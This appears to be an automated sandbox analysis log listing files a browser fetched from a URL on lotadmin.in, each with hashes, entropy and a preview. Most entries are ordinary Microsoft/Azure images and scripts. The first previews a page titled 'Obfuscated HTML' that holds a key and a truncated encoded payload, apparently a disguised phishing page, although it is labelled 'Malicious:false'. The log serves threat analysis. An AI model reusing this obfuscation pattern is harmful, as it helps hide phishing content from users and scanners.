                                                                        Size (bytes):3146
                                                                        Entropy (8bit):5.338524213273031
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:ECD20EB06A6EC3A48FA5A698C24ABA86
                                                                        SHA1:3A78F36DCB602AB0727695250EDFD28D81011C39
                                                                        SHA-256:E4CD6B39FE04BABC0E3430B76CE4CC4D8C9F95781D49E3A09148E5C746014BD1
                                                                        SHA-512:25562D7E49D0F8D0175A14291A1C52BB6399791F30249EF75878E5BB4877959B572CE6004728D8A2F1A678BACEF70378CE8F35F3875592CEE8766D9614A7891D
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://lotadmin.in/due/cigam/index
                                                                        Preview:<!DOCTYPE html>.<html>.<head>. <title>Obfuscated HTML</title>.</head>.<body>. <script>. var key = "secretkey";. var encodedHtml = "T0QnPSYgMjU8Uw0XHwlKYVkRBwgPUgkVBQJEUQANUFt+Vw0cEgFdeEVUS0VFHgAXE0UXAwQLAAAXT0chPyNUS0ddeEVUS0VFHgAXE0UaCggcTkcVGwADGwoLB0dDEQoaHwAXB1hBBQwQHw1EFwAVGwYRRhIQFxELXkUdBQwNGgQPXxYXCgkcTlRNQkdKYUVZU0VfBgwABwBHOgYGUigVBVlWBwwXHgBKYUVZU0VfHgwaAEULFgleUBYAEgkcAA0GFxFWSw0LFgNeUA0AHxUKSUpMEQEaARZXEAkMBwESBwQLFksAHQhbCg8YC0oPGwcHRAMWHRFOExIRGAoUFkpVXFVaW0oaABZMEwkYRQgQHUsAARZWVW9ZU0VDTgkdBQ5ZAQAPT0cHHxwVFhYLFwAASUURAQAFT0cHHxwVFksAARZWVW9FXA0GEwFKYVkbHAEaTG9US0VZTwEKBEUXBwQKAFhBBAAGAgMQEAQXGwoaRgYWHRECGwsRGUdHeUVDUkVUS0VZTwEKBEUXBwQKAFhBBAAGAgMQEAQXGwoaRgYYAQFBTG9US0VZU0VDUkVUS0VFFwwVUgYYChYKTkcPHQIbRgYWHRECGwsRGUdHeUVDUkVUS0VZU0VDUkVUS0VFGggEUhYGCFhbGggCFQBbBwoeHEsTHAJWSwYVEhYQT0cYBAIWUwkMEwEdBQJbUwQPBlhWJwoeHEdDHQsYBAQdTkcXGgwHRQYVEhYQPgwHH0sLFhUPEwYRQ0IVHAQHGwsTTElZVAkMEwERD0JQUVtpUkVUS0VZU0VDUkVUV0odGhNdeG9US0VZU0VDUkVUS0VFFwwVUgYYChYKTkcVFxcdD
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):32430
                                                                        Entropy (8bit):4.356567934964662
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:BAFE79E0C43855F90798214635C94DFA
                                                                        SHA1:BC8397E35A82C03C8D9068A4747B4063EE30B23F
                                                                        SHA-256:A56F528A55B6E44AF5C81B14BEEDBA9A607529DFEC60B238CB5A102E3F26BA8D
                                                                        SHA-512:6895A7E6CDCA61FEAC857285DC0460115D51C3C0A098B7CE445EB2D37EE3E364BEDFE4E8ED77C7D7897763734C4B13B581711D80509F89E1BFE3E0B35AF477DE
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:if (!window.CardGridCarousel) {. window.CardGridCarousel = class CardGridCarousel {. constructor(opts) {. this.SELECTORS = {. carousel: ".carousel",. carouselCardsContainer: ".carousel-product-card .appsource-cards-container",. gridCardsContainer: ".card-grid__cards .appsource-cards-container",. carouselSpinner: ".appsource-spinner-container",. prevBtn: ".carousel__arrow-prev",. nextBtn: ".carousel__arrow-next",. };.. this.STRINGS = {. combobox: "COMBOBOX",. tab: "TAB",. appSourceFeatured: "appSourceFeatured",. GRID: "GRID",. CAROUSEL: "CAROUSEL",. LEARN_MORE: "Learn More",. FREE: "Free",. };.. this.ELEMENTS = {};.. this.CONFIG = {. payloadProxy: {},. compId: opts.compId,. lo
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ISO Media, AVIF Image
                                                                        Category:downloaded
                                                                        Size (bytes):192161
                                                                        Entropy (8bit):7.998674842603962
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:0EADECE76E0939A57123E20AD974CC38
                                                                        SHA1:767C370214C7BBA7BF32E0D3B2823AFD32496F46
                                                                        SHA-256:028032C390067C25ED511391512FAF6D0324A4C48EB7D89036EEF2FF4ADD9C42
                                                                        SHA-512:4BF4E24F45BF54447B69C92DAC252193BEE9F2873DF8F563B59829E5430070F9AA1EEDBD97283FDF537D70B1CD1E4A1394FBDECF1FBD2EF7A3EDFA5556A309C2
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/Desktop-solutions-tab2-img3@2x?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=1312&hei=984&qlt=100&fit=crop"
                                                                        Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D...............%'...(iinf..........infe........av01Color....jiprp...Kipco....ispe....... ........pixi............av1C........colrnclx...........ipma.................%/mdat.....*h.......2...D.......N....-O..xu..P.m..<..)..y..4.....A*z..v.....Ib....m.......+.Se....3`Wp........&..2.|.V..ntq.F.q./_....ri|4%..,...`9....5{T.TF..K....Q..k..XTs....},...o..8....e'#.J.T.!...?..u..V.../.R.P-|..2...$.nf...B...+..U....x.C..y.4.v...F.H..]..+.r...SO6(.O:5.y.w.d..i...K.t....,0.<a...\...".o'Np.].....J).p<m=.F..&......tQ.Z.}2..V....f`93 jGJug....cX.B.Q6.k.....(.....ik...p...xX3G.:./..tr.$e{i..}.....R>%... ._fUR..y#.....^Z...V.@..T..ff"....2...wF..z...{'...jF..O..].....JO..|...t.P..Q.8.A..%..f...f."....$2x...L<.....Oz....L;.r.....okm.W...s.HK.@..1(x.[^...s........{.....a...(......!.(..O........N...$V......#.EL=z..$..Y....$..3.....1..&....L!.IY...g{....... ...z.h....e.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:SVG Scalable Vector Graphics image
                                                                        Category:dropped
                                                                        Size (bytes):2794
                                                                        Entropy (8bit):5.233688565353086
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:CB5F2C9F7CDF1EF877536517FF8442AC
                                                                        SHA1:1193BEF1234DE166731BA26C2FB28305532F8FF9
                                                                        SHA-256:494001460745E3BAE1E20A340F1D6C6B4724D01DC7DD7F09392CDBDC2B200508
                                                                        SHA-512:B5B39FEE69095F2FA77636E0472544F341044EB588281E761EFA8FCFC956E7662A08945780FC4F7B6F31C8CC7D0EEB83E379126F96920CC9AE971BEB9E81F83E
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:<svg width="28" height="28" viewBox="0 0 28 28" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_52_11956)">.<path fill-rule="evenodd" clip-rule="evenodd" d="M17.92 2.47326C18.6045 2.47326 19.2111 2.98659 19.4289 3.73326C19.6467 4.47992 20.9222 9.09992 20.9222 9.09992V18.2777H16.3022L16.3956 2.4577H17.92V2.47326Z" fill="url(#paint0_linear_52_11956)"/>.<path d="M24.7022 9.6444C24.7022 9.31774 24.4378 9.06885 24.1267 9.06885H21.4044C19.4911 9.06885 17.9355 10.6244 17.9355 12.5377V18.2933H21.2333C23.1467 18.2933 24.7022 16.7377 24.7022 14.8244V9.6444Z" fill="url(#paint1_linear_52_11956)"/>.<path fill-rule="evenodd" clip-rule="evenodd" d="M17.9199 2.47327C17.391 2.47327 16.971 2.89327 16.971 3.42216L16.8777 20.891C16.8777 23.4422 14.8088 25.511 12.2577 25.511H3.87327C3.46882 25.511 3.20438 25.1222 3.32883 24.7488L10.0488 5.56882C10.7022 3.71771 12.4444 2.47327 14.4044 2.47327H17.9355H17.9199Z" fill="url(#paint2_linear_52_11956)"/>.</g>.<defs>.<linearGradient id="pai
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ISO Media, AVIF Image
                                                                        Category:downloaded
                                                                        Size (bytes):53905
                                                                        Entropy (8bit):7.992316686766827
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:F76D58FE82E1A47F1EAA15521D0B0169
                                                                        SHA1:8E0682CD6EBBA2AB7296E0202E5E623E2D48192A
                                                                        SHA-256:60453C7B8C46E911862933393620094D6F104C3912E459F21299B034EF8FEA01
                                                                        SHA-512:6914F862573DF79533CE606B3252753B7A354129DB0047977DA861FCF57AF98861904BC50C927854B3FB453BE4F6E6AAD89D3A38937F69DD2FD690AF1416BDA9
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/371220-desktop-cardcarousel-featurednews-card3?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=832&hei=357&qlt=100&fmt=png-alpha&fit=constrain"
                                                                        Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm.........,iloc....D............,...e.............w...Biinf..........infe........av01Color.....infe........av01Alpha.....iref........auxl..........iprp....ipco....ispe.......@...e....pixi............av1C........colrnclx...........pixi..........av1C.......8auxC....urn:mpeg:mpegB:cicp:systems:auxiliary:alpha.....ipma..........................mdat.....&3.#..2j...$P.?\h.Y.2....W.:Y.B...p..:......L..:.../ .q.$...b..=......V.<b.1H.g.`z...O..GM.b.>g3J.,..w=.........&3.#..4..2..D....'.....#k...K...*...E'?..1.....W2h^8.?#.d8P%y..He.PA..(._Z=.N.Z2..:..+..VA....b..0.HH...<..yL.DM..~.s...yc.u"d.[|r.`.;..`O..kVq........Ak_Ay..&[......./.(...U..d.]%,<...E.2F.t....X..-...Y..__RNrW.-T..u*>X.q.....'.}).0...,k..g[.(.$..".hj....G.Q:.r.......@q..@..E....y..>.;..A..n.F...=F..f.5..../.#z.W.d..$...I*..7|.G.o..m..).!g..#IZ...........d..=..R...<>....1:W18.`?........O..T....vk...c.c.,5....
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:C++ source, ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):697
                                                                        Entropy (8bit):4.9687589816244095
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:D2F3218A374A1305FE262FC4BAEEDDD1
                                                                        SHA1:103721E516DC86A8EC433C6EA7C227BF7D954A55
                                                                        SHA-256:F76208F59F7E18EFB405361893B45B9DD7D0759BB5329AC664F39C02384982CD
                                                                        SHA-512:011062B7E77B5BBCACC6391C6E9873D4221E3474276F56D36EF29B78EA9E7C1C6C2021DA3D80D79C30E1675AC0CE62DC397C52051C7C1478054C02AF27BC7077
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:/**. * OneCloud environment constants class.. */.class OneCloudEnvironmentConstants {.. /**. * OneCloud data connector AEM publisher variables.. * @readonly. */. static DataConnector = Object.freeze({. "endpoint": "/msonecloudapi",. queryParams: {}. });.. /**. * Microsoft API Prod Endpoint. * @readonly. */. static MicrosoftAPI = Object.freeze({. "endpoint": "https://www.microsoft.com/msstoreapiprod". });.. /**. * Appsource Request Header. * @readonly. */. static AppsourceAPI = Object.freeze({. "header": "Njg1YmM2MWI1ZTA4MWVlMzAxZTQwM2YxMzk2MjU4YzljMDE3Nzc0NDM2MWMyMzg3MGQwZjMwYzIxZWY0ODMwMQ==". });.}
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ISO Media, AVIF Image
                                                                        Category:downloaded
                                                                        Size (bytes):56414
                                                                        Entropy (8bit):7.995855343339323
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:8970A6F1D161F9117D2D6FB4C580E7A9
                                                                        SHA1:7ACD0C0926B0A747BB5E96D0A8E05517916ED8E1
                                                                        SHA-256:194C14F32C175C64DDA794CFF14828FE69985B1A0DEB82EE3F853636712A27DE
                                                                        SHA-512:0A7E3FF30B71BDC3817E4C175AF2D5A7B32C03110CDD328C5491558BEDF4FF04C782C398988DEA4E536051AE1E233AB88AB6B9D4ACF3F425DE3007CA17759DCA
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/resources-tab-2-2x?scl=1
                                                                        Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D................D...(iinf..........infe........av01Color....jiprp...Kipco....ispe................pixi............av1C........colrnclx...........ipma..................Lmdat.....*s.O.....2...D<.0..P.X.!..Phw...E@./p.k.O.s..p!...?.D..'c.......1Zc.........+..8T| ../bc...).3.I2...\.|:..|....*..].I.}.n.s....X<...w/.."..P.9..yo..R*...b.....)...X..@.I......e....X^..*:j.C!R<.?$...S.^...."S.7QY.E..(.P\!.:uA...I)........0...?.C..]..R..Q..5y.H...,S.w..J..$...=..4..f.8>b.2.;..k.L^d.Os..............O.Bq......=.=p..6.:9.mE.+....Z.El5(...O.....e..{{...=._.4.._m....Xl........7..HQl.....` d.6U...*U~Dw.J.*..l..(&......K%.9..u.u.wF..@}~.l.|.....E..mK/.zJcEur.....^......D...b..2....V..L_..2#...g..ua{6.._....y..j.L..V.p..S..d~..(............N'.?...;..G.cqDm.CR..+..z4....H.....'..tJ0..%....qy8.."...Z.-......$.@U..l.....]]...7j..ua.5.R|..A@k(..9...|.]....h....W..n..!b.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:PNG image data, 91 x 14, 8-bit/color RGB, non-interlaced
                                                                        Category:downloaded
                                                                        Size (bytes):61
                                                                        Entropy (8bit):4.068159130770307
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:1CBF900CE0E92E2035D80C761368126F
                                                                        SHA1:C415A45A9B8E73604BCACFA0788A02E935139C43
                                                                        SHA-256:2FC02FB0CCE1F085C8FEE21D4550B7CB1138E33F828CE2003243E93AB56945FE
                                                                        SHA-512:8399240A2722E71A990DD60380614406EED30231366041DF7753C694EC9E5597491DFBB18C209A156BF0E9C222BC96C82E3D4B2CCE5D3ACA3B889E8DF7EE17C0
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8f0771a5eb8c4368/1733940761673/LOLW0F00es6ux50
                                                                        Preview:.PNG........IHDR...[.................IDAT.....$.....IEND.B`.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (505)
                                                                        Category:downloaded
                                                                        Size (bytes):1418
                                                                        Entropy (8bit):5.418786110345074
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:20AAFDF6904D3DC5DB0E0E33ABBFC1A4
                                                                        SHA1:CC1A639FF69FE0D8A8F1EFEE7FCB04941E7B57C8
                                                                        SHA-256:EE4E620F350907CE3867454B2BD45984BE949EB46B113183D4B8B403032DA14D
                                                                        SHA-512:91B0BD81FCD2D3D040D9FC1DB74F5CA916EF88E7887D2868530BF1319EAF5462CC54421AB80FC97B258B569B9AF40F2B9FD1B6D417C9A4561BBA22EDF785D905
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://azure.microsoft.com/etc.clientlibs/cascade.component.authoring/clientlibs/clientlib-jquery-cookie.min.ACSHASH20aafdf6904d3dc5db0e0e33abbfc1a4.js
                                                                        Preview:/*. jQuery Cookie Plugin v1.4.1. https://github.com/carhartl/jquery-cookie.. Copyright 2013 Klaus Hartl. Released under the MIT license.*/.'use strict';(function(d){"function"===typeof define&&define.amd?define(["jquery"],d):"object"===typeof exports?d(require("jquery")):d(jQuery)})(function(d){function l(a,c){if(e.raw)var b=a;else a:{0===a.indexOf('"')&&(a=a.slice(1,-1).replace(/\\"/g,'"').replace(/\\\\/g,"\\"));try{a=decodeURIComponent(a.replace(m," "));b=e.json?JSON.parse(a):a;break a}catch(h){}b=void 0}return d.isFunction(c)?c(b):b}var m=/\+/g,e=d.cookie=function(a,c,b){if(void 0!==c&&!d.isFunction(c)){b=d.extend({},e.defaults,b);.if("number"===typeof b.expires){var h=b.expires,g=b.expires=new Date;g.setTime(+g+864E5*h)}a=e.raw?a:encodeURIComponent(a);c=e.json?JSON.stringify(c):String(c);c=e.raw?c:encodeURIComponent(c);return document.cookie=[a,"\x3d",c,b.expires?"; expires\x3d"+b.expires.toUTCString():"",b.path?"; path\x3d"+b.path:"",b.domain?"; domain\x3d"+b.domain:"",b.secure?";
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (3164)
                                                                        Category:dropped
                                                                        Size (bytes):34401
                                                                        Entropy (8bit):5.567515913811421
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:5EE9E4E4E0A5FD39092E63D2D102B12B
                                                                        SHA1:1B66C81BD03006B327228854327C0FD3DF434BC2
                                                                        SHA-256:441B9F212CD322C6B039A2691F999EB2FAFC10FD645BCDB043A6DEE2DD052DA7
                                                                        SHA-512:3CA07A5D89931BCF6F0294C0727020A7FFE663487DB6ECC309FF69DDF59A0490BF85395E91241D40ED1DCF157C0784E6D6B53D8C92D52ED05823CCB6FBE1C470
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:'use strict';(()=>{function L(n){var r=T[n];if(void 0!==r)return r.exports;r=T[n]={exports:{}};return U[n](r,r.exports,L),r.exports}var U={3770:(n,r,h)=>{n.exports=h(2494).default},2494:(n,r,h)=>{function f(x){return!x.response&&!!x.code&&"ECONNABORTED"!==x.code&&(0,a.default)(x)}function g(x){return"ECONNABORTED"!==x.code&&(!x.response||500<=x.response.status&&599>=x.response.status)}function p(x){return!!x.config&&g(x)&&-1!==t.indexOf(x.config.method)}function m(x){return f(x)||p(x)}function k(){return 0}.function l(x){var H=x[A]||{};return H.retryCount=H.retryCount||0,x[A]=H,H}function u(x,H){x.interceptors.request.use(function(E){return l(E).lastRequestTime=Date.now(),E});x.interceptors.response.use(null,function(E){var v=E.config;if(!v)return Promise.reject(E);var I=Object.assign({},H,v[A]),P=I.retries;P=void 0===P?3:P;var J=I.retryCondition;J=void 0===J?m:J;var M=I.retryDelay;M=void 0===M?k:M;I=I.shouldResetTimeout;I=void 0!==I&&I;var Q=l(v);if(J(E)&&Q.retryCount<P){Q.retryCount+
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ISO Media, AVIF Image
                                                                        Category:downloaded
                                                                        Size (bytes):126793
                                                                        Entropy (8bit):7.997011039498862
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:0FA816602B17EBB2B0AFADFF9D05BF86
                                                                        SHA1:34F9E4F308D2084714990AD336DC57245F9AC345
                                                                        SHA-256:B8450289F1EA118571C4D0CF538D260313AB3BE3B8A55A1E5D260ED67F60F29A
                                                                        SHA-512:F840E6FDCE4F19ECA83A4A1CD19FD94B8DC5EBC2149B0F90A625A70249A040146705752B7A72C8BA2FDF6685B0D13EAC4B4FEB07FF7D21D8A07F41857B1AAAB7
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/Desktop-solutions-tab2-img2@2x?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=1312&hei=984&qlt=100&fit=crop"
                                                                        Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D................/...(iinf..........infe........av01Color....jiprp...Kipco....ispe....... ........pixi............av1C........colrnclx...........ipma..................7mdat.....*h.......2...D.......N....-O..xu..P.m...Z.7.;..Y..Z...=....7?.$...0...b.F..#0.x{.:.R.k&...M1r.#....Dn.....U.VK.p.5. 0.TZ.=s.z...f...........[D.8|..f...EE.3g...Q...*..-BV.'...O.. ....#.Y .%...n.D..E..c.R....H.dq.)Qb.....K..o./8.2r..+3..kJ]5..-v]3R....0`Q.G.....<p.....r....{T.u.y<.bP....s..r.....j/.....nk.h#.Y......m..T..a.R.v.6.o#.z.WF,.+03..Z..yS..J?...XV.._.s),.......P..#..|i.U..J{@/}.$/..Zt..~.e.u.".b.......7k[.<.y.......t..1....A..d...m..$.)...#%.f\....4n.Y....-)D..C..%Z...qV.......l?G...L...1.. ...c....(.B..{......L...te@..W>Hq.H.Qw.v...'H..8.u,.>Bgs....j....I[.U V.3..hT8.9.k...f...n...!...7..o.S...". ._wZ......f.7k..^.....Ql..H.+|+...-...)...\..U.......I.g.$..x.m.{|
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text
                                                                        Category:downloaded
                                                                        Size (bytes):9316
                                                                        Entropy (8bit):4.267140948442776
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:2B143BED0FF34BC70BC0703346F70E08
                                                                        SHA1:7FB14A8842293FD041C7C138285AC2F822AC4B4C
                                                                        SHA-256:C35BBDEE4A46BFBF552989E1126E1F09B454EB3DC2523376C38964BF6128BE86
                                                                        SHA-512:46BBF881243EC3C27046FCB66F9D8412B459CC7B6DA1ABF0DCB5F70D578F57E9A88D52431753B65F851892055AC17EDD9446E11BA67D7B0DA80B2B2615F67688
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://azure.microsoft.com/etc.clientlibs/cascade.component.authoring/clientlibs/clientlib-reimagine-base.min.ACSHASH2b143bed0ff34bc70bc0703346f70e08.js
                                                                        Preview:// This function replaces popover data-island tags insertd in RTE via the popover plugin.(function () {. if (!window || !window.ocrReimagine) {. return;. }.. window.ocrReimagine.PopoverRichTextPlugin = new class {. popoverRichTextMountSelector = '.popover-rte-mount';. popoverMountSelector = '[data-mount="popover"]';.. isPopoverComponentEnabled() {. return !!(window.mwf?.Popover);. }.. isIconComponentEnabled() {. return !!(window.ocrReimagine?.Icon?.getInstances());. }.. /**. * Initialize popover elements with the class 'popover-rte-mount' by looking up inside the target element or entire document.. */. initializePopoverRichTextPlugin() {. if (!this.isPopoverComponentEnabled()) {. return;. }.. // Get all popover rich text elements.. const popoverRichTextElements = this.getPopoverRichTextElements();.. if (!popo
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ISO Media, AVIF Image
                                                                        Category:downloaded
                                                                        Size (bytes):65393
                                                                        Entropy (8bit):7.986632409104875
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:50F66B11F65E15458275EAC61940DFC1
                                                                        SHA1:6B15558C7AC01A6721B946C95A0E0AB71853C9E5
                                                                        SHA-256:7AF3A0F9417C1CDAC3C45676484B94F8815A86A67F30CFFC98E444B573DF360A
                                                                        SHA-512:C7DD388876E946E84ADE8B0B6764C24D0E82C64F79CF494C005FF83A92FB601B9CE5E1ED2D00FB7772407BE747D545646D470F802A2216B955CC6809DF246EB2
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/371220-desktop-cardcarousel-featurednews-card2?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=832&hei=357&qlt=100&fmt=png-alpha&fit=constrain"
                                                                        Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm.........,iloc....D............,...E.............w...Biinf..........infe........av01Color.....infe........av01Alpha.....iref........auxl..........iprp....ipco....ispe.......@...e....pixi............av1C........colrnclx...........pixi..........av1C.......8auxC....urn:mpeg:mpegB:cicp:systems:auxiliary:alpha.....ipma..........................mdat.....&3.#..2j...$P.?\h.Y.2....W.:Y.B...p..:......L..:.../ .q.$...b..=......V.<b.1H.g.`z...O..GM.b.>g3J.,..w=.........&3.#..4..2...D......#lf.....$.......b.U..a.Vz>*...$, ..-..8.....,o{.t...bW(.J..F.Q.....(...ye.bW.t.....p....x*.Af.)....b.+.\g.L.g..1..3....'>........M.U..m.tzw.*I2..jE".mD..R..c.....u.A=..t-...."....#x.,....L........o.............#..6....|.nv"...jh..h?.j..}}...;..._F.....^W0.DnCO..*....EXP'.i9G...<dQi........90..Xt......ZS.$f..\S;......|...V7.$......P.}.....=.U..e']F.VH./..%...s......y@...9.`......*K#./.........
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:RIFF (little-endian) data, Web/P image
                                                                        Category:dropped
                                                                        Size (bytes):90660
                                                                        Entropy (8bit):7.992390438707304
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:A3CE193DA2DE67B9B6DCAF6D988DC8C0
                                                                        SHA1:323905B0B49B81FDDD422F11FBE5D11F687E0BE3
                                                                        SHA-256:4F0B49ADB0A495EBE5216F01DD9FA73A4B11A8B7070CF2F6510AFFE127D543C1
                                                                        SHA-512:A102FA4799B9F3E4C2599B6A066618CE51DDFE1616BD6A53F1C21D5AD23CE2BF42414A570D9E9B9D68116D317ACC83B342C055986FADA1071F8653C5D0256F58
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:RIFF.b..WEBPVP8L.b../?.Y....$.mp\.......d,".D....S._..`........}...D.......`.7..+^C....M$..d.}o...z.y.......0oYk-I.....<Z......".>.93..Q.(.s........S......[..Z.1"v.p.7..ZD..6..'.y].Ry.N'.#I....r......./...S.=.(...$GR.....O:.t..pc.v.,y/.y/N..D._......pi.A../.........~.L..J.h. @...$.....o....)E......- ...~..MA.....RJOF.o.(RBpo.H.!.P..P..!.....8X.R. ...}..E.. ..o...#EM..(..K.9....&.. .....5Eg.0...3..1F.7.D....o.....]O...@D.&......2.......E..-`.......1....#r.1...p#.3W..m#9.....>.."b...U....JwU].;...T.H.u..R.C.E.$....kY.........{..^.).N..V^.+.....|`g.$E.Ns|J.r*=Iww..-....$Ig..q.\...33....X....!0.`.....t'.![...f~...}.1..8/.g...IX:W1...,.....c.a.@....."$......[i..m.mKY{..T?p..%sP{......s....+........M.6..)L.>.g_}4ny....;.+...%.BA......M..K.2([v.).,vfB.G.E/.....h#A.@.0%}.3.z.)......K......>..6.mU..~w.."2. ..(.".i.y.B$I................t.....Z.....4U.e.|.....{..V..v.o...e.....=............=...R.......2d.....,..8.RA..]A.!.s.BE/.-.aZ..B..B.H*z...v...0...|0
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:RIFF (little-endian) data, Web/P image
                                                                        Category:dropped
                                                                        Size (bytes):241332
                                                                        Entropy (8bit):7.84847910444477
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:68AA09E447CC65BD41CAE424FCB73739
                                                                        SHA1:FA383D544F2E003F70AD0158F7030A804E3F0721
                                                                        SHA-256:70A2146EE273A838A5B5B77CBE78DD4934C700D841624A2682A529BC969B6ABC
                                                                        SHA-512:CC6C8FA20888353ADBE43F61F251502FC54D57BD15C886D1B38BBF5117161B5A6901D2C02B74C0E17E85674267E01DF70593382FEC63FC22A9D7AFAC163A966B
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:RIFF....WEBPVP8L..../....Hl.H.$.o..3..?.....".?.V.VU.Uj.....W...~p.0...-..Ze=.P.U~..?Ti.~..*_.......~.........$._......YIf|.9sd=}....;..1.3.$.V.C......9I^..B........V...:.$k..N.y..'.......@7h...d.}......g.#Y.]O9.^4twH...,i..j.vh...h ....tW.jU.;.. .N2.*.j.t.:I.dhH..u\..;.dN.O.0..To'!....!......&..1..t..} {W....$!$!....Uu..$!..$A.....U.D?&....&./..H.V-..x.;Yu.ne..qft.<.xq.e..@...$..}xc....-PQ.Fy..*`o......$..*...[D.g7......87U.v....... .e..~.{..b?.x...UU.J.m...:...t'...s0.\.P..b..L.vm[.l.<.......9'..Ir$[~....U..j.W'K...fH.$.....)...w...(.T..".TT(..$.V.0.a.......H.*OLI...R. $...H...Qr.R.eE^C^B..x.....T%B"aYF..u.Y)..2......0,..Ht.F"$...%...q.J...g.Kc$.........e.....]...#..F....*.^........}W|.{..U.{..R%.C...k.3..<.y.u.a"Qa.=.;..s.....|..H*k..g..6..y.....X.O..|@...h{.u...(..]c....8.`.|.....n6...WTDyG..._.y..-.....z../..n[s..p6l....7.......#......`...c.l...aY6...m(.H)...+Z...y.p.l.f.....v..,~..=.w"U.....1..nv.<..7.?T.Zk.7.....l\./.*..e(.......2....
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (510)
                                                                        Category:downloaded
                                                                        Size (bytes):1973
                                                                        Entropy (8bit):4.4914538760871165
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:81B1EF0C4A6B80454291234FCD6E45B0
                                                                        SHA1:1353F3119D378FFB222149AE19755423EF5347BE
                                                                        SHA-256:B05D865A37D5EFC60E028BC9FBC6B63459C78D21B0B70B3797AC97C1AD9BA88D
                                                                        SHA-512:6409931AF06BAE75E4CFC57FF2B877915404A9D805F8C9076390C4BC8FF634BA96B2ED561FCC4E57869110E62BE05AB75A1578E7935CEC9605EAA77C893643AD
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://azure.microsoft.com/etc.clientlibs/onecloud/clientlibs/reimagine/clientlib-reimagine-base.min.ACSHASH81b1ef0c4a6b80454291234fcd6e45b0.css
